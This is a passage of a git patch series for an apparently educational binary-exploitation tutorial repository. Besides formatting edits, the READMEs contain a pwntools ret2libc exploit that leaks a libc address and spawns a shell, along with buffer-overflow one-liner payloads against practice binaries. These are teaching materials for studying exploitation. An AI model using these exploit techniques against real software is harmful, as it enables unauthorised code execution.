; ret` ropgadget, so we add these in. 
+After this, we know we'll need the `read()`, `write()`, the GOT address of `read()`, and a `pop; ret` ropgadget, so we add these in. -```Pyton +```python write_plt = p32(binary.symbols["write"]) read_GOT = p32(binary.symbols["got.read"]) read_plt = p32(binary.symbols["read"]) @@ -126,19 +101,15 @@ bss_addr = p32(binary.symbols["__bss_start"]) pop_ret = "\x9d\x85\x04\x08" ``` -Now the binary outputs a line first, so we add +Now the binary outputs a line first, so we add: -```Python +```python r.recvline() ``` -Now we should start building our exploit. We want to try to avoid using the -escape strings from before, it makes for nicer code and forces you to use -`pwntools` the right way. - -So, we add: +Now we should start building our exploit. We want to try to avoid using the escape strings from before, it makes for nicer code and forces you to use `pwntools` the right way. -```Python +```python exploit = "A"*140 # EIP offset exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) # Call to write() exploit += p32(binary.symbols["main"]) # Call main() again to retrigger the vulnerability @@ -147,42 +118,38 @@ exploit += p32(binary.symbols["main"]) # Call main() ag Now we want to send the first payload: -```Python +```python r.sendline(exploit) ``` -Now here's the cool part. Since we know that the program prints out the address -of `read()` in the `libc` (remember those funky bytes from earlier before the -SEGFAULT?) we can take those and calculate the base address of `libc`. This -indirectly means that we can call any function in the standard library. +Now here's the cool part. Since we know that the program prints out the address of `read()` in the `libc` (remember those funky bytes from earlier before the SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library. 
-``` +```python addr_read = int(r.recv(4)[::-1].encode("hex"),16) r.recvline() libc_base = addr_read - libc.symbols["read"] system = p32(libc_base + libc.symbols["system"]) ``` -For those unfamiliar with my hacky `addr_read` line, here's what it does. -First, it `recv()`'s 4 bytes. Then, it reverses them (remember the little -endian). Then it takes them and converts them to hex, and parses that as an -integer. Voila, we have the address of `read()` in the libc. From there, we -subtract `read()`s address in the regular libc, giving us the base address for -this runtime. In the last line, we add the offset of `system()` in the libc to -our calculated base. This gives us the address of system for this runtime. +Let's break down my hacky `addr_read` line. -The best part of this whole show is that the pesky `"/bin/sh"` string we seem to -keep needing is in the `libc`! We can calculate the address of that as well! +1. `recv()` 4 bytes from `r` +2. Reverses the remaining bytes (because of little endian encoding) and converts them to hex +3. Parse that as an integer. -``` +Voila! We now have the address of `read()` in `libc`. + +From there, we subtract `read()`s address in the regular libc, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of system for this runtime. + +The best part of this whole show is that the pesky `"/bin/sh"` string we need is in `libc`! We can calculate the address of that as well! + +```python binsh = p32(libc_base + libc.search("/bin/sh").next()) ``` -Now all we've got to do is send our exploit with some extra padding (it was 140 -before, but now it's 148 since we overflow from before the stack frame) and we -get a shell. +Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell. 
-``` +```python r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? r.interactive() ``` From 1babe530ceb28060e7f23df24f82dcc7124ea3f9 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:18:55 -0500 Subject: [PATCH 43/48] Code formatting and paragraph formatting for intro-1/README --- intro-1/README.md | 45 +++++++++++++++------------------------------ 1 file changed, 15 insertions(+), 30 deletions(-) diff --git a/intro-1/README.md b/intro-1/README.md index d2ecbe6..775a7ac 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,8 +1,6 @@ # Intro 1: What is a binary, really? -In short, a binary is the output file that the computer can actually run when you -compile high level code, such as C or C++. I believe in hands on learning, so -we can take a look inside one to really find out. +In short, a binary is the output file that the computer can actually run when you compile high level code, such as C or C++. I believe in hands on learning, so we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C @@ -12,28 +10,24 @@ int main() { } ``` -This is your average C file, more or less. It's got a main function, some -includes, and a little bit of code to be run. However, your computer can't -actually run it. In order to make it usable, we must compile it: +This is your average C file, more or less. It's got a main function, some includes, and a little bit of code to be run. However, your computer can't actually run it. In order to make it usable, we must compile it: -``` +```shell $ gcc -m32 hello_world.c -o hello_world.bin ``` -You can ignore the `-m32` argument (we'll talk about it later), but the -`-o hello_world.bin` simply specifies what the name of the output file -is going to be. +You can ignore the `-m32` argument (we'll talk about it later), but the `-o hello_world.bin` simply specifies what the name of the output file is going to be. 
From here, we can execute it: -``` + +```shell $ ./hello_world.bin Hello World! ``` -Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper. -We can open `gdb (GNU Debugger)` and see what's happening under the hood: +Unsurprisingly, we get `"Hello World!"` as output. But let's go a bit deeper. We can open `gdb (GNU Debugger)` and see what's happening under the hood: -``` +```gdb $ gdb -q ./hello_world.bin Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. gdb-peda$ disas main @@ -52,36 +46,27 @@ gdb-peda$ quit Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified. -The weird code that `gdb` displayed is called assembly language. It's the lowest -level human readable code out there. Each line maps directly to a machine instruction. -Let's break this down. +The weird code that `gdb` displayed is called assembly language. It's the lowest level human readable code out there. Each line maps directly to a machine instruction. Let's break this down. -``` +```asm 0x0804841d <+0>: push %ebp 0x0804841e <+1>: mov %esp,%ebp 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x10,%esp ``` -The numbers you see on the left are addresses. You can think of these just like your house -address: `0x0804841d` is where the instruction `push %ebp` lives. These -first four instructions are just conventions for a function, in this case `main()`. +The hex numbers you see on the left are addresses. You can think of these just like your house address: `0x0804841d` is where the instruction `push %ebp` lives. These first four instructions are just conventions for a function, in this case `main()`. -``` +```asm 0x08048426 <+9>: movl $0x80484d0,(%esp) 0x0804842d <+16>: call 0x80482f0 ``` -These instructions are what actually print out "Hello World!". The program -moves the address of the string `"Hello World!"` into the memory address that `%esp` -points to. 
`%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out -whatever is at the address we supplied. +These instructions are what actually print out `"Hello World!"`. The program moves the address of the string `"Hello World!"` into the memory address that `%esp` points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied. -``` +```asm 0x08048432 <+21>: leave 0x08048433 <+22>: ret ``` -The last two instructions just return control from our `main()` function back to the C -library, which does some clean up and then exits the program. We'll be learning more -about how these binaries function in later tutorials. +The last two instructions return control from our `main()` function back to the C library, which then does some clean up and exits the program. We'll be learning more about how these binaries function in later tutorials. From 03927c2ce8dfda1e1a776481a1f9d80b59c5ddf6 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:22:05 -0500 Subject: [PATCH 44/48] Code formatting for stack dumps and phrasing --- intro-2/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 767aaf7..832b312 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,4 +1,4 @@ -# Intro 2: Screwing aroung with the stack. +# Intro 2: Screwing around with the stack. 
**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** @@ -43,7 +43,7 @@ You can tell just by reading through this file that the obvious objective here i Here's an example stack dump: -``` +```salt $ ./overflow1-3948d17028101c40 Usage: stack_overwrite [str] $ ./overflow1-3948d17028101c40 AAAA @@ -77,7 +77,7 @@ Sorry, you lose. Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) -``` +```salt /overflow1-3948d17028101c40 $(python -c 'print "A"*76') Stack dump: 0xfff577d4: 0xfff58853 (second argument) @@ -107,7 +107,7 @@ win = 1094795585 Sorry, you lose. ``` -This shell command: `$(python -c 'print "A"*76')` tells python to print out 76 "A"s. +This shell command: `$(python -c 'print "A"*76')` tells python to print out the `A` character 76 times. Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program. @@ -134,7 +134,7 @@ We want to set `win` equal to the *integer* representation of `1`, not the chara Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"` to our buffer. This will leak the last byte (`0x01`) of the buffer we wrote to where `win` is stored, setting `win = 1`. 
-``` +```salt $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') Stack dump: 0xffe29f04: 0xffe2b85e (second argument) From c598d78eab67439a379c919968216536b101b817 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:25:24 -0500 Subject: [PATCH 45/48] Delete .gdb_history --- .gdb_history | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 .gdb_history diff --git a/.gdb_history b/.gdb_history deleted file mode 100644 index 0ceeaa5..0000000 --- a/.gdb_history +++ /dev/null @@ -1,2 +0,0 @@ -clear -q From b8e829383e151de4aad8befa0bd7e2e259494fbb Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:27:45 -0500 Subject: [PATCH 46/48] README update --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7183044..4802cf5 100644 --- a/README.md +++ b/README.md @@ -35,12 +35,12 @@ a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of these tutorials. It provides a wide range of useful functions and makes `gdb` - far more user friendly. Just follow the install instructions in the repo. + far more user friendly. Just follow the installation instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew of useful functions and chicanery that makes the exploit process more fun and - less painful. It can be installed by running `sudo pip install pwntools` + less painful. 
Install with: `$ sudo pip install pwntools` ## Introductory Tutorials: From b611bfcdd4f22bbcbe8881399643c7b632284794 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:48:24 -0500 Subject: [PATCH 47/48] Added code formatting --- exercise-2/README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 3e751cb..cd25e1b 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -25,7 +25,7 @@ Now unlike the last problem, you might notice that there is no call to `system(" Let's take a look at the disassembly to learn a bit more about `system()` -``` +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ disas main @@ -42,7 +42,7 @@ Dump of assembler code for function main: Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`. -``` +```objdump $ objdump -d overflow | grep system 080483d0 : 8048560: e8 6b fe ff ff call 80483d0 @@ -50,7 +50,7 @@ $ objdump -d overflow | grep system Now let's try to break the binary. -``` +```salt $ strace ./overflow $(python -c 'print "A"*44') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- @@ -58,7 +58,7 @@ $ strace ./overflow $(python -c 'print "A"*44') We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting a return value. 
It simply means that we have control over the control flow. Now let's supply our address. -``` +```shell ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') Good thing you don't have /bin/sh Good luck getting a shell. @@ -73,7 +73,7 @@ Now this is really weird. What happened here is that we called `system()`. We di Now when the programmer wrote this, (I wrote this one :P) he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string! -``` +```gdb $ gdb -q ./overflow Reading symbols from overflow...(no debugging symbols found)...done. gdb-peda b*main @@ -90,7 +90,7 @@ overflow : 0x804963a ("/bin/sh") Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it. Finally, our finished exploit looks like so: -``` +```shell ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + "\x3a\x86\x04\x08"') ``` From f598e01c3c6c103464e2ebcc6a9ac1e06b1e5915 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 17 Jun 2018 14:47:09 -0700 Subject: [PATCH 48/48] Update README.md Add a break down of the exploit --- exercise-3/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/exercise-3/README.md b/exercise-3/README.md index 5d85810..addfb27 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -143,4 +143,16 @@ Let's give the exploit a try: "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` +The layout of the exploit looks like the following: + +``` + + + + + +<"/b"> + + + + <"/in"> + + + + <"sh"> + + + +``` + + You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands.
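If the escape strings at the end of that command are hard to read, here's a minimal sketch of how the last stage is laid out. It only rebuilds the three words visible above, using Python's `struct` module instead of hand-written escapes. I'm assuming `0x080483a0` is the function being called and `0x0804a030` is its argument (both values are just the escape strings decoded as little endian). The names `pack_addr`, `func_addr`, `arg_addr`, and `final_stage` are mine, not part of the exercise.

```python
import struct


def pack_addr(value):
    # Pack a 32-bit value as 4 little-endian bytes (the same idea as pwntools' p32).
    return struct.pack("<I", value)


# Assumed roles, decoded from the escape strings in the command above.
func_addr = 0x080483a0  # "\xa0\x83\x04\x08"
arg_addr = 0x0804a030   # "\x30\xa0\x04\x08"

# 32-bit calling convention on the stack:
# function address, then its return address, then its first argument.
final_stage = pack_addr(func_addr) + b"FAKE" + pack_addr(arg_addr)

print(repr(final_stage))
```

The `FAKE` word sits in the slot the called function would return to. Since we don't plan on coming back from the shell, a placeholder is good enough here.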